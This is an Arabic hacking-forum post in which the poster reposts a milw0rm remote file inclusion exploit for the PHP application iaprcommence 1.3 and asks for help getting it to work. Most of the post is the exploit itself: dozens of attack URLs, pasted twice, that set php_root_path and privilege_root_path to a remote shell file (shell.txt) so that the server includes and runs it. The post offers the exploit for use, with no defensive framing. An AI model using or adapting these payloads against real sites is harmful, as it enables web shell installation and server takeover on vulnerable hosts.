BieNVeNue ChEz VoUs
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

BieNVeNue ChEz VoUs

iNSCRiVeZ-VouS aVaNT KSa Se BLoCK
 
الرئيسيةأحدث الصورالتسجيلدخول

 

 غرة جديدة ومحتاجة شرح

اذهب الى الأسفل 
كاتب الموضوعرسالة
Admin
Admin



المساهمات : 121
تاريخ التسجيل : 25/11/2007

غرة جديدة ومحتاجة شرح Empty
مُساهمةموضوع: غرة جديدة ومحتاجة شرح   غرة جديدة ومحتاجة شرح Icon_minitimeالإثنين نوفمبر 26, 2007 1:43 pm

الرجاء من المحترفين شرح هذه الثغرة لأنها اعتقد انها جيدة جدا
وهى لسه نازلة النهاردة بنفس التاريخ

المصدر
http://www.milw0rm.com/exploits/4659


الثغرة
كود PHP:

---------------------
Author : ShAy6oOoN
---------------------
Group : PitBull Crew
---------------------
Script : iaprcommence 1.3
---------------------
Download : http://downloads.sourceforge.net/iaprcommence/CommenceV1_3.zip?modtime=1195816743&big_mirror=0
---------------------
Vulnerability Type : Remote File Inclusion
---------------------
Method : get
---------------------
Register_globals : On
---------------------
Exploit URL's :
---------------------

http://localhost/Commence/includes/db_connect.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/includes/include_all_fns.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/includes/main_fns.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/includes/output_fns.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/includes/user_authen_fns.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/admin/includes/include_all_fns.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/admin/phase/include_all_phase.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/admin/phase/phase1.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/admin/phase/phase1.php?privilege_root_path=http://localhost/shell.txt?

http://localhost/Commence/admin/phase/phase2.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/admin/phase/phase2.php?privilege_root_path=http://localhost/shell.txt?

http://localhost/Commence/admin/phase/phase3.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/admin/phase/phase3.php?privilege_root_path=http://localhost/shell.txt?

http://localhost/Commence/admin/phase/phase4.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/admin/phase/phase4.php?privilege_root_path=[

http://localhost/Commence/admin/phase/phasebase.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/includes/page_includes/page.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/includes/page_includes/pagebase.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/reviewer/includes/include_all_fns.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/reviewer/phase/include_all_phase.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/includes/page_includes/pagebase.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/reviewer/phase/phase1.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/reviewer/phase/phase1.php?privilege_root_path=http://localhost/shell.txt?

http://localhost/Commence/reviewer/phase/phase2.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/reviewer/phase/phase2.php?privilege_root_path=http://localhost/shell.txt?

http://localhost/Commence/reviewer/phase/phase3.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/reviewer/phase/phase3.php?privilege_root_path=http://localhost/shell.txt?

http://localhost/Commence/reviewer/phase/phase4.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/reviewer/phase/phase4.php?privilege_root_path=http://localhost/shell.txt?

http://localhost/Commence/reviewer/phase/phasebase.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/user/phase/include_all_phase.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/user/phase/phase1.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/user/phase/phase2.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/user/phase/phase3.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/user/phase/phase4.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/user/phase/phasebase.php?php_root_path=http://localhost/shell.txt?


Greetings:
----------

PitBull Crew : The_PitBull - iNs - c0ol - Raz0r


Thanks To:
----------

str0ke

Your smile counts. The more smiles you share, the more we donate. Join in!



~~~~~~~~~~~~~~~~~~~~~~~
~ iaprcommence 1.3 RFI ~
~~~~~~~~~~~~~~~~~~~~~~~

---------------------
Author : ShAy6oOoN
---------------------
Group : PitBull Crew
---------------------
Script : iaprcommence 1.3
---------------------
Download : http://downloads.sourceforge.net/iaprcommence/CommenceV1_3.zip?modtime=1195816743&big_mirror=0
---------------------
Vulnerability Type : Remote File Inclusion
---------------------
Method : get
---------------------
Register_globals : On
---------------------
Exploit URL's :
---------------------

http://localhost/Commence/includes/db_connect.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/includes/include_all_fns.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/includes/main_fns.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/includes/output_fns.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/includes/user_authen_fns.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/admin/includes/include_all_fns.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/admin/phase/include_all_phase.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/admin/phase/phase1.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/admin/phase/phase1.php?privilege_root_path=http://localhost/shell.txt?

http://localhost/Commence/admin/phase/phase2.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/admin/phase/phase2.php?privilege_root_path=http://localhost/shell.txt?

http://localhost/Commence/admin/phase/phase3.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/admin/phase/phase3.php?privilege_root_path=http://localhost/shell.txt?

http://localhost/Commence/admin/phase/phase4.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/admin/phase/phase4.php?privilege_root_path=[

http://localhost/Commence/admin/phase/phasebase.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/includes/page_includes/page.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/includes/page_includes/pagebase.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/reviewer/includes/include_all_fns.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/reviewer/phase/include_all_phase.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/includes/page_includes/pagebase.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/reviewer/phase/phase1.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/reviewer/phase/phase1.php?privilege_root_path=http://localhost/shell.txt?

http://localhost/Commence/reviewer/phase/phase2.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/reviewer/phase/phase2.php?privilege_root_path=http://localhost/shell.txt?

http://localhost/Commence/reviewer/phase/phase3.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/reviewer/phase/phase3.php?privilege_root_path=http://localhost/shell.txt?

http://localhost/Commence/reviewer/phase/phase4.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/reviewer/phase/phase4.php?privilege_root_path=http://localhost/shell.txt?

http://localhost/Commence/reviewer/phase/phasebase.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/user/phase/include_all_phase.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/user/phase/phase1.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/user/phase/phase2.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/user/phase/phase3.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/user/phase/phase4.php?php_root_path=http://localhost/shell.txt?

http://localhost/Commence/user/phase/phasebase.php?php_root_path=http://localhost/shell.txt?
انا تتبعت جميع الخطوات وقمت بتثبيت سيرفر داخلي ولكن لم يعمل معي السكريبت
ارجو ان يشرحه احد
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://hacker-man.yoo7.com
 
غرة جديدة ومحتاجة شرح
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» ثغرة جديدة ومواقع كثيره مصابه

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
BieNVeNue ChEz VoUs :: الثغرات-
انتقل الى: